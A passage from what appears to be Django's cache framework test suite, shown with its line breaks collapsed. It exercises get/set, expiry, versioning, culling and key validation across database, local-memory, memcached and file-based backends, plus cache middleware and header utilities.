self.assertFalse(caches['prefix'].has_key('somekey')) caches['prefix'].set('somekey', 'value2') self.assertEqual(cache.get('somekey'), 'value') self.assertEqual(caches['prefix'].get('somekey'), 'value2') def test_non_existent(self): # Non-existent cache keys return as None/default # get with non-existent keys self.assertEqual(cache.get("does_not_exist"), None) self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!") def test_get_many(self): # Multiple cache keys can be returned using get_many cache.set('a', 'a') cache.set('b', 'b') cache.set('c', 'c') cache.set('d', 'd') self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'}) self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'}) def test_delete(self): # Cache keys can be deleted cache.set("key1", "spam") cache.set("key2", "eggs") self.assertEqual(cache.get("key1"), "spam") cache.delete("key1") self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), "eggs") def test_has_key(self): # The cache can be inspected for cache keys cache.set("hello1", "goodbye1") self.assertEqual(cache.has_key("hello1"), True) self.assertEqual(cache.has_key("goodbye1"), False) def test_in(self): # The in operator can be used to inspect cache contents cache.set("hello2", "goodbye2") self.assertEqual("hello2" in cache, True) self.assertEqual("goodbye2" in cache, False) def test_incr(self): # Cache values can be incremented cache.set('answer', 41) self.assertEqual(cache.incr('answer'), 42) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.incr('answer', 10), 52) self.assertEqual(cache.get('answer'), 52) self.assertEqual(cache.incr('answer', -10), 42) self.assertRaises(ValueError, cache.incr, 'does_not_exist') def test_decr(self): # Cache values can be decremented cache.set('answer', 43) self.assertEqual(cache.decr('answer'), 42) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.decr('answer', 10), 32) self.assertEqual(cache.get('answer'), 32) self.assertEqual(cache.decr('answer', -10), 42) self.assertRaises(ValueError, cache.decr, 'does_not_exist') def test_close(self): self.assertTrue(hasattr(cache, 'close')) cache.close() def test_data_types(self): # Many different data types can be cached stuff = { 'string': 'this is a string', 'int': 42, 'list': [1, 2, 3, 4], 'tuple': (1, 2, 3, 4), 'dict': {'A': 1, 'B': 2}, 'function': f, 'class': C, } cache.set("stuff", stuff) self.assertEqual(cache.get("stuff"), stuff) def test_cache_read_for_model_instance(self): # Don't want fields with callable as default to be called on cache read expensive_calculation.num_runs = 0 Poll.objects.all().delete() my_poll = Poll.objects.create(question="Well?") self.assertEqual(Poll.objects.count(), 1) pub_date = my_poll.pub_date cache.set('question', my_poll) cached_poll = cache.get('question') self.assertEqual(cached_poll.pub_date, pub_date) # We only want the default expensive calculation run once self.assertEqual(expensive_calculation.num_runs, 1) def test_cache_write_for_model_instance_with_deferred(self): # Don't want fields with callable as default to be called on cache write expensive_calculation.num_runs = 0 Poll.objects.all().delete() Poll.objects.create(question="What?") self.assertEqual(expensive_calculation.num_runs, 1) defer_qs = Poll.objects.all().defer('question') self.assertEqual(defer_qs.count(), 1) self.assertEqual(expensive_calculation.num_runs, 1) cache.set('deferred_queryset', defer_qs) # cache set should not re-evaluate default functions self.assertEqual(expensive_calculation.num_runs, 1) def test_cache_read_for_model_instance_with_deferred(self): # Don't want fields with callable as default to be called on cache read expensive_calculation.num_runs = 0 Poll.objects.all().delete() Poll.objects.create(question="What?") self.assertEqual(expensive_calculation.num_runs, 1) defer_qs = Poll.objects.all().defer('question') self.assertEqual(defer_qs.count(), 1) cache.set('deferred_queryset', defer_qs) self.assertEqual(expensive_calculation.num_runs, 1) runs_before_cache_read = expensive_calculation.num_runs cache.get('deferred_queryset') # We only want the default expensive calculation run on creation and set self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read) def test_expiration(self): # Cache values can be set to expire cache.set('expire1', 'very quickly', 1) cache.set('expire2', 'very quickly', 1) cache.set('expire3', 'very quickly', 1) time.sleep(2) self.assertEqual(cache.get("expire1"), None) cache.add("expire2", "newvalue") self.assertEqual(cache.get("expire2"), "newvalue") self.assertEqual(cache.has_key("expire3"), False) def test_unicode(self): # Unicode values can be cached stuff = { 'ascii': 'ascii_value', 'unicode_ascii': 'Iñtërnâtiônàlizætiøn1', 'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2', 'ascii2': {'x': 1} } # Test `set` for (key, value) in stuff.items(): cache.set(key, value) self.assertEqual(cache.get(key), value) # Test `add` for (key, value) in stuff.items(): cache.delete(key) cache.add(key, value) self.assertEqual(cache.get(key), value) # Test `set_many` for (key, value) in stuff.items(): cache.delete(key) cache.set_many(stuff) for (key, value) in stuff.items(): self.assertEqual(cache.get(key), value) def test_binary_string(self): # Binary strings should be cacheable from zlib import compress, decompress value = 'value_to_be_compressed' compressed_value = compress(value.encode()) # Test set cache.set('binary1', compressed_value) compressed_result = cache.get('binary1') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) # Test add cache.add('binary1-add', compressed_value) compressed_result = cache.get('binary1-add') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) # Test set_many cache.set_many({'binary1-set_many': compressed_value}) compressed_result = cache.get('binary1-set_many') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) def test_set_many(self): # Multiple keys can be set using set_many cache.set_many({"key1": "spam", "key2": "eggs"}) self.assertEqual(cache.get("key1"), "spam") self.assertEqual(cache.get("key2"), "eggs") def test_set_many_expiration(self): # set_many takes a second ``timeout`` parameter cache.set_many({"key1": "spam", "key2": "eggs"}, 1) time.sleep(2) self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), None) def test_delete_many(self): # Multiple keys can be deleted using delete_many cache.set("key1", "spam") cache.set("key2", "eggs") cache.set("key3", "ham") cache.delete_many(["key1", "key2"]) self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), None) self.assertEqual(cache.get("key3"), "ham") def test_clear(self): # The cache can be emptied using clear cache.set("key1", "spam") cache.set("key2", "eggs") cache.clear() self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), None) def test_long_timeout(self): ''' Using a timeout greater than 30 days makes memcached think it is an absolute expiration timestamp instead of a relative offset. Test that we honour this convention. Refs #12399. ''' cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second self.assertEqual(cache.get('key1'), 'eggs') cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1) self.assertEqual(cache.get('key2'), 'ham') cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1) self.assertEqual(cache.get('key3'), 'sausage') self.assertEqual(cache.get('key4'), 'lobster bisque') def test_forever_timeout(self): ''' Passing in None into timeout results in a value that is cached forever ''' cache.set('key1', 'eggs', None) self.assertEqual(cache.get('key1'), 'eggs') cache.add('key2', 'ham', None) self.assertEqual(cache.get('key2'), 'ham') cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None) self.assertEqual(cache.get('key3'), 'sausage') self.assertEqual(cache.get('key4'), 'lobster bisque') def test_zero_timeout(self): ''' Passing in None into timeout results in a value that is cached forever ''' cache.set('key1', 'eggs', 0) self.assertEqual(cache.get('key1'), None) cache.add('key2', 'ham', 0) self.assertEqual(cache.get('key2'), None) cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0) self.assertEqual(cache.get('key3'), None) self.assertEqual(cache.get('key4'), None) def test_float_timeout(self): # Make sure a timeout given as a float doesn't crash anything. cache.set("key1", "spam", 100.2) self.assertEqual(cache.get("key1"), "spam") def _perform_cull_test(self, cull_cache, initial_count, final_count): # Create initial cache key entries. This will overflow the cache, # causing a cull. for i in range(1, initial_count): cull_cache.set('cull%d' % i, 'value', 1000) count = 0 # Count how many keys are left in the cache. for i in range(1, initial_count): if cull_cache.has_key('cull%d' % i): count = count + 1 self.assertEqual(count, final_count) def test_cull(self): self._perform_cull_test(caches['cull'], 50, 29) def test_zero_cull(self): self._perform_cull_test(caches['zero_cull'], 50, 19) def test_invalid_keys(self): """ All the builtin backends (except memcached, see below) should warn on keys that would be refused by memcached. This encourages portable caching code without making it too difficult to use production backends with more liberal key rules. Refs #6447. """ # mimic custom ``make_key`` method being defined since the default will # never show the below warnings def func(key, *args): return key old_func = cache.key_func cache.key_func = func try: with warnings.catch_warnings(record=True) as w: warnings.simplefilter("always") # memcached does not allow whitespace or control characters in keys cache.set('key with spaces', 'value') self.assertEqual(len(w), 2) self.assertIsInstance(w[0].message, CacheKeyWarning) with warnings.catch_warnings(record=True) as w: warnings.simplefilter("always") # memcached limits key length to 250 cache.set('a' * 251, 'value') self.assertEqual(len(w), 1) self.assertIsInstance(w[0].message, CacheKeyWarning) finally: cache.key_func = old_func def test_cache_versioning_get_set(self): # set, using default version = 1 cache.set('answer1', 42) self.assertEqual(cache.get('answer1'), 42) self.assertEqual(cache.get('answer1', version=1), 42) self.assertEqual(cache.get('answer1', version=2), None) self.assertEqual(caches['v2'].get('answer1'), None) self.assertEqual(caches['v2'].get('answer1', version=1), 42) self.assertEqual(caches['v2'].get('answer1', version=2), None) # set, default version = 1, but manually override version = 2 cache.set('answer2', 42, version=2) self.assertEqual(cache.get('answer2'), None) self.assertEqual(cache.get('answer2', version=1), None) self.assertEqual(cache.get('answer2', version=2), 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertEqual(caches['v2'].get('answer2', version=1), None) self.assertEqual(caches['v2'].get('answer2', version=2), 42) # v2 set, using default version = 2 caches['v2'].set('answer3', 42) self.assertEqual(cache.get('answer3'), None) self.assertEqual(cache.get('answer3', version=1), None) self.assertEqual(cache.get('answer3', version=2), 42) self.assertEqual(caches['v2'].get('answer3'), 42) self.assertEqual(caches['v2'].get('answer3', version=1), None) self.assertEqual(caches['v2'].get('answer3', version=2), 42) # v2 set, default version = 2, but manually override version = 1 caches['v2'].set('answer4', 42, version=1) self.assertEqual(cache.get('answer4'), 42) self.assertEqual(cache.get('answer4', version=1), 42) self.assertEqual(cache.get('answer4', version=2), None) self.assertEqual(caches['v2'].get('answer4'), None) self.assertEqual(caches['v2'].get('answer4', version=1), 42) self.assertEqual(caches['v2'].get('answer4', version=2), None) def test_cache_versioning_add(self): # add, default version = 1, but manually override version = 2 cache.add('answer1', 42, version=2) self.assertEqual(cache.get('answer1', version=1), None) self.assertEqual(cache.get('answer1', version=2), 42) cache.add('answer1', 37, version=2) self.assertEqual(cache.get('answer1', version=1), None) self.assertEqual(cache.get('answer1', version=2), 42) cache.add('answer1', 37, version=1) self.assertEqual(cache.get('answer1', version=1), 37) self.assertEqual(cache.get('answer1', version=2), 42) # v2 add, using default version = 2 caches['v2'].add('answer2', 42) self.assertEqual(cache.get('answer2', version=1), None) self.assertEqual(cache.get('answer2', version=2), 42) caches['v2'].add('answer2', 37) self.assertEqual(cache.get('answer2', version=1), None) self.assertEqual(cache.get('answer2', version=2), 42) caches['v2'].add('answer2', 37, version=1) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 42) # v2 add, default version = 2, but manually override version = 1 caches['v2'].add('answer3', 42, version=1) self.assertEqual(cache.get('answer3', version=1), 42) self.assertEqual(cache.get('answer3', version=2), None) caches['v2'].add('answer3', 37, version=1) self.assertEqual(cache.get('answer3', version=1), 42) self.assertEqual(cache.get('answer3', version=2), None) caches['v2'].add('answer3', 37) self.assertEqual(cache.get('answer3', version=1), 42) self.assertEqual(cache.get('answer3', version=2), 37) def test_cache_versioning_has_key(self): cache.set('answer1', 42) # has_key self.assertTrue(cache.has_key('answer1')) self.assertTrue(cache.has_key('answer1', version=1)) self.assertFalse(cache.has_key('answer1', version=2)) self.assertFalse(caches['v2'].has_key('answer1')) self.assertTrue(caches['v2'].has_key('answer1', version=1)) self.assertFalse(caches['v2'].has_key('answer1', version=2)) def test_cache_versioning_delete(self): cache.set('answer1', 37, version=1) cache.set('answer1', 42, version=2) cache.delete('answer1') self.assertEqual(cache.get('answer1', version=1), None) self.assertEqual(cache.get('answer1', version=2), 42) cache.set('answer2', 37, version=1) cache.set('answer2', 42, version=2) cache.delete('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), None) cache.set('answer3', 37, version=1) cache.set('answer3', 42, version=2) caches['v2'].delete('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', version=2), None) cache.set('answer4', 37, version=1) cache.set('answer4', 42, version=2) caches['v2'].delete('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), None) self.assertEqual(cache.get('answer4', version=2), 42) def test_cache_versioning_incr_decr(self): cache.set('answer1', 37, version=1) cache.set('answer1', 42, version=2) cache.incr('answer1') self.assertEqual(cache.get('answer1', version=1), 38) self.assertEqual(cache.get('answer1', version=2), 42) cache.decr('answer1') self.assertEqual(cache.get('answer1', version=1), 37) self.assertEqual(cache.get('answer1', version=2), 42) cache.set('answer2', 37, version=1) cache.set('answer2', 42, version=2) cache.incr('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 43) cache.decr('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 42) cache.set('answer3', 37, version=1) cache.set('answer3', 42, version=2) caches['v2'].incr('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', version=2), 43) caches['v2'].decr('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', version=2), 42) cache.set('answer4', 37, version=1) cache.set('answer4', 42, version=2) caches['v2'].incr('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), 38) self.assertEqual(cache.get('answer4', version=2), 42) caches['v2'].decr('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), 37) self.assertEqual(cache.get('answer4', version=2), 42) def test_cache_versioning_get_set_many(self): # set, using default version = 1 cache.set_many({'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {}) # set, default version = 1, but manually override version = 2 cache.set_many({'ford2': 37, 'arthur2': 42}, version=2) self.assertEqual(cache.get_many(['ford2', 'arthur2']), {}) self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {}) self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42}) # v2 set, using default version = 2 caches['v2'].set_many({'ford3': 37, 'arthur3': 42}) self.assertEqual(cache.get_many(['ford3', 'arthur3']), {}) self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {}) self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42}) # v2 set, default version = 2, but manually override version = 1 caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1) self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42}) self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42}) self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {}) def test_incr_version(self): cache.set('answer', 42, version=2) self.assertEqual(cache.get('answer'), None) self.assertEqual(cache.get('answer', version=1), None) self.assertEqual(cache.get('answer', version=2), 42) self.assertEqual(cache.get('answer', version=3), None) self.assertEqual(cache.incr_version('answer', version=2), 3) self.assertEqual(cache.get('answer'), None) self.assertEqual(cache.get('answer', version=1), None) self.assertEqual(cache.get('answer', version=2), None) self.assertEqual(cache.get('answer', version=3), 42) caches['v2'].set('answer2', 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertEqual(caches['v2'].get('answer2', version=1), None) self.assertEqual(caches['v2'].get('answer2', version=2), 42) self.assertEqual(caches['v2'].get('answer2', version=3), None) self.assertEqual(caches['v2'].incr_version('answer2'), 3) self.assertEqual(caches['v2'].get('answer2'), None) self.assertEqual(caches['v2'].get('answer2', version=1), None) self.assertEqual(caches['v2'].get('answer2', version=2), None) self.assertEqual(caches['v2'].get('answer2', version=3), 42) self.assertRaises(ValueError, cache.incr_version, 'does_not_exist') def test_decr_version(self): cache.set('answer', 42, version=2) self.assertEqual(cache.get('answer'), None) self.assertEqual(cache.get('answer', version=1), None) self.assertEqual(cache.get('answer', version=2), 42) self.assertEqual(cache.decr_version('answer', version=2), 1) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.get('answer', version=1), 42) self.assertEqual(cache.get('answer', version=2), None) caches['v2'].set('answer2', 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertEqual(caches['v2'].get('answer2', version=1), None) self.assertEqual(caches['v2'].get('answer2', version=2), 42) self.assertEqual(caches['v2'].decr_version('answer2'), 1) self.assertEqual(caches['v2'].get('answer2'), None) self.assertEqual(caches['v2'].get('answer2', version=1), 42) self.assertEqual(caches['v2'].get('answer2', version=2), None) self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2) def test_custom_key_func(self): # Two caches with different key functions aren't visible to each other cache.set('answer1', 42) self.assertEqual(cache.get('answer1'), 42) self.assertEqual(caches['custom_key'].get('answer1'), None) self.assertEqual(caches['custom_key2'].get('answer1'), None) caches['custom_key'].set('answer2', 42) self.assertEqual(cache.get('answer2'), None) self.assertEqual(caches['custom_key'].get('answer2'), 42) self.assertEqual(caches['custom_key2'].get('answer2'), 42) def test_cache_write_unpickable_object(self): update_middleware = UpdateCacheMiddleware() update_middleware.cache = cache fetch_middleware = FetchFromCacheMiddleware() fetch_middleware.cache = cache request = self.factory.get('/cache/test') request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data, None) response = HttpResponse() content = 'Testing cookie serialization.' response.content = content response.set_cookie('foo', 'bar') update_middleware.process_response(request, response) get_cache_data = fetch_middleware.process_request(request) self.assertNotEqual(get_cache_data, None) self.assertEqual(get_cache_data.content, content.encode('utf-8')) self.assertEqual(get_cache_data.cookies, response.cookies) update_middleware.process_response(request, get_cache_data) get_cache_data = fetch_middleware.process_request(request) self.assertNotEqual(get_cache_data, None) self.assertEqual(get_cache_data.content, content.encode('utf-8')) self.assertEqual(get_cache_data.cookies, response.cookies) def test_add_fail_on_pickleerror(self): "See https://code.djangoproject.com/ticket/21200" with self.assertRaises(pickle.PickleError): cache.add('unpickable', Unpickable()) def test_set_fail_on_pickleerror(self): "See https://code.djangoproject.com/ticket/21200" with self.assertRaises(pickle.PickleError): cache.set('unpickable', Unpickable()) @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.db.DatabaseCache', # Spaces are used in the table name to ensure quoting/escaping is working LOCATION='test cache table' )) class DBCacheTests(BaseCacheTests, TransactionTestCase): available_apps = ['cache'] def setUp(self): # The super calls needs to happen first for the settings override. super(DBCacheTests, self).setUp() self.create_table() def tearDown(self): # The super call needs to happen first because it uses the database. super(DBCacheTests, self).tearDown() self.drop_table() def create_table(self): management.call_command('createcachetable', verbosity=0, interactive=False) def drop_table(self): with connection.cursor() as cursor: table_name = connection.ops.quote_name('test cache table') cursor.execute('DROP TABLE %s' % table_name) def test_zero_cull(self): self._perform_cull_test(caches['zero_cull'], 50, 18) def test_second_call_doesnt_crash(self): stdout = six.StringIO() management.call_command( 'createcachetable', stdout=stdout ) self.assertEqual(stdout.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES)) def test_createcachetable_with_table_argument(self): """ Delete and recreate cache table with legacy behavior (explicitly specifying the table name). """ self.drop_table() stdout = six.StringIO() management.call_command( 'createcachetable', 'test cache table', verbosity=2, stdout=stdout ) self.assertEqual(stdout.getvalue(), "Cache table 'test cache table' created.\n") def test_clear_commits_transaction(self): # Ensure the database transaction is committed (#19896) cache.set("key1", "spam") cache.clear() transaction.rollback() self.assertEqual(cache.get("key1"), None) @override_settings(USE_TZ=True) class DBCacheWithTimeZoneTests(DBCacheTests): pass class DBCacheRouter(object): """A router that puts the cache table on the 'other' database.""" def db_for_read(self, model, **hints): if model._meta.app_label == 'django_cache': return 'other' def db_for_write(self, model, **hints): if model._meta.app_label == 'django_cache': return 'other' def allow_migrate(self, db, model): if model._meta.app_label == 'django_cache': return db == 'other' @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.db.DatabaseCache', 'LOCATION': 'my_cache_table', }, }, ) class CreateCacheTableForDBCacheTests(TestCase): multi_db = True def test_createcachetable_observes_database_router(self): old_routers = router.routers try: router.routers = [DBCacheRouter()] # cache table should not be created on 'default' with self.assertNumQueries(0, using='default'): management.call_command('createcachetable', database='default', verbosity=0, interactive=False) # cache table should be created on 'other' # Queries: # 1: check table doesn't already exist # 2: create the table # 3: create the index with self.assertNumQueries(3, using='other'): management.call_command('createcachetable', database='other', verbosity=0, interactive=False) finally: router.routers = old_routers class PicklingSideEffect(object): def __init__(self, cache): self.cache = cache self.locked = False def __getstate__(self): if self.cache._lock.active_writers: self.locked = True return {} @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.locmem.LocMemCache', )) class LocMemCacheTests(BaseCacheTests, TestCase): def setUp(self): super(LocMemCacheTests, self).setUp() # LocMem requires a hack to make the other caches # share a data store with the 'normal' cache. caches['prefix']._cache = cache._cache caches['prefix']._expire_info = cache._expire_info caches['v2']._cache = cache._cache caches['v2']._expire_info = cache._expire_info caches['custom_key']._cache = cache._cache caches['custom_key']._expire_info = cache._expire_info caches['custom_key2']._cache = cache._cache caches['custom_key2']._expire_info = cache._expire_info @override_settings(CACHES={ 'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}, 'other': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': 'other' }, }) def test_multiple_caches(self): "Check that multiple locmem caches are isolated" cache.set('value', 42) self.assertEqual(caches['default'].get('value'), 42) self.assertEqual(caches['other'].get('value'), None) def test_locking_on_pickle(self): """#20613/#18541 -- Ensures pickling is done outside of the lock.""" bad_obj = PicklingSideEffect(cache) cache.set('set', bad_obj) self.assertFalse(bad_obj.locked, "Cache was locked during pickling") cache.add('add', bad_obj) self.assertFalse(bad_obj.locked, "Cache was locked during pickling") def test_incr_decr_timeout(self): """incr/decr does not modify expiry time (matches memcached behavior)""" key = 'value' _key = cache.make_key(key) cache.set(key, 1, timeout=cache.default_timeout * 10) expire = cache._expire_info[_key] cache.incr(key) self.assertEqual(expire, cache._expire_info[_key]) cache.decr(key) self.assertEqual(expire, cache._expire_info[_key]) # memcached backend isn't guaranteed to be available. # To check the memcached backend, the test settings file will # need to contain at least one cache backend setting that points at # your memcache server. memcached_params = {} for _cache_params in settings.CACHES.values(): if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'): memcached_params = _cache_params @unittest.skipUnless(memcached_params, "memcached not available") @override_settings(CACHES=caches_setting_for_tests(base=memcached_params)) class MemcachedCacheTests(BaseCacheTests, TestCase): def test_invalid_keys(self): """ On memcached, we don't introduce a duplicate key validation step (for speed reasons), we just let the memcached API library raise its own exception on bad keys. Refs #6447. In order to be memcached-API-library agnostic, we only assert that a generic exception of some kind is raised. """ # memcached does not allow whitespace or control characters in keys self.assertRaises(Exception, cache.set, 'key with spaces', 'value') # memcached limits key length to 250 self.assertRaises(Exception, cache.set, 'a' * 251, 'value') # Explicitly display a skipped test if no configured cache uses MemcachedCache @unittest.skipUnless( memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache', "cache with python-memcached library not available") def test_memcached_uses_highest_pickle_version(self): # Regression test for #19810 for cache_key, cache in settings.CACHES.items(): if cache['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache': self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL) def test_cull(self): # culling isn't implemented, memcached deals with it. pass def test_zero_cull(self): # culling isn't implemented, memcached deals with it. pass @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.filebased.FileBasedCache', )) class FileBasedCacheTests(BaseCacheTests, TestCase): """ Specific test cases for the file-based cache. """ def setUp(self): super(FileBasedCacheTests, self).setUp() self.dirname = tempfile.mkdtemp() for cache_params in settings.CACHES.values(): cache_params.update({'LOCATION': self.dirname}) def tearDown(self): shutil.rmtree(self.dirname) super(FileBasedCacheTests, self).tearDown() def test_ignores_non_cache_files(self): fname = os.path.join(self.dirname, 'not-a-cache-file') with open(fname, 'w'): os.utime(fname, None) cache.clear() self.assertTrue(os.path.exists(fname), 'Expected cache.clear to ignore non cache files') os.remove(fname) def test_clear_does_not_remove_cache_dir(self): cache.clear() self.assertTrue(os.path.exists(self.dirname), 'Expected cache.clear to keep the cache dir') def test_creates_cache_dir_if_nonexistent(self): os.rmdir(self.dirname) cache.set('foo', 'bar') os.path.exists(self.dirname) @override_settings(CACHES={ 'default': { 'BACKEND': 'cache.liberal_backend.CacheClass', }, }) class CustomCacheKeyValidationTests(TestCase): """ Tests for the ability to mixin a custom ``validate_key`` method to a custom cache backend that otherwise inherits from a builtin backend, and override the default key validation. Refs #6447. """ def test_custom_key_validation(self): # this key is both longer than 250 characters, and has spaces key = 'some key with spaces' * 15 val = 'a value' cache.set(key, val) self.assertEqual(cache.get(key), val) @override_settings( CACHES={ 'default': { 'BACKEND': 'cache.closeable_cache.CacheClass', } } ) class GetCacheTests(IgnorePendingDeprecationWarningsMixin, TestCase): def test_simple(self): from django.core.cache import caches, DEFAULT_CACHE_ALIAS, get_cache self.assertIsInstance( caches[DEFAULT_CACHE_ALIAS], get_cache('default').__class__ ) cache = get_cache( 'django.core.cache.backends.dummy.DummyCache', **{'TIMEOUT': 120} ) self.assertEqual(cache.default_timeout, 120) self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist') def test_close(self): from django.core import signals self.assertFalse(cache.closed) signals.request_finished.send(self.__class__) self.assertTrue(cache.closed) def test_close_deprecated(self): from django.core.cache import get_cache from django.core import signals cache = get_cache('cache.closeable_cache.CacheClass') self.assertFalse(cache.closed) signals.request_finished.send(self.__class__) self.assertTrue(cache.closed) @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix', CACHE_MIDDLEWARE_SECONDS=1, CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, USE_I18N=False, ) class CacheUtils(TestCase): """TestCase for django.utils.cache functions.""" def setUp(self): self.host = 'www.example.com' self.path = '/cache/test/' self.factory = RequestFactory(HTTP_HOST=self.host) def _get_request_cache(self, method='GET', query_string=None, update_cache=None): request = self._get_request(self.host, self.path, method, query_string=query_string) request._cache_update_cache = True if not update_cache else update_cache return request def _set_cache(self, request, msg): response = HttpResponse() response.content = msg return UpdateCacheMiddleware().process_response(request, response) def test_patch_vary_headers(self): headers = ( # Initial vary, new headers, resulting vary. (None, ('Accept-Encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'), ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ) for initial_vary, newheaders, resulting_vary in headers: response = HttpResponse() if initial_vary is not None: response['Vary'] = initial_vary patch_vary_headers(response, newheaders) self.assertEqual(response['Vary'], resulting_vary) def test_get_cache_key(self): request = self.factory.get(self.path) response = HttpResponse() key_prefix = 'localprefix' # Expect None if no headers have been set yet. self.assertEqual(get_cache_key(request), None) # Set headers to an empty list. learn_cache_key(request, response) self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) # Verify that a specified key_prefix is taken into account. learn_cache_key(request, response, key_prefix=key_prefix) self.assertEqual( get_cache_key(request, key_prefix=key_prefix), 'views.decorators.cache.cache_page.localprefix.GET.' '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) def test_get_cache_key_with_query(self): request = self.factory.get(self.path, {'test': 1}) response = HttpResponse() # Expect None if no headers have been set yet. self.assertEqual(get_cache_key(request), None) # Set headers to an empty list. learn_cache_key(request, 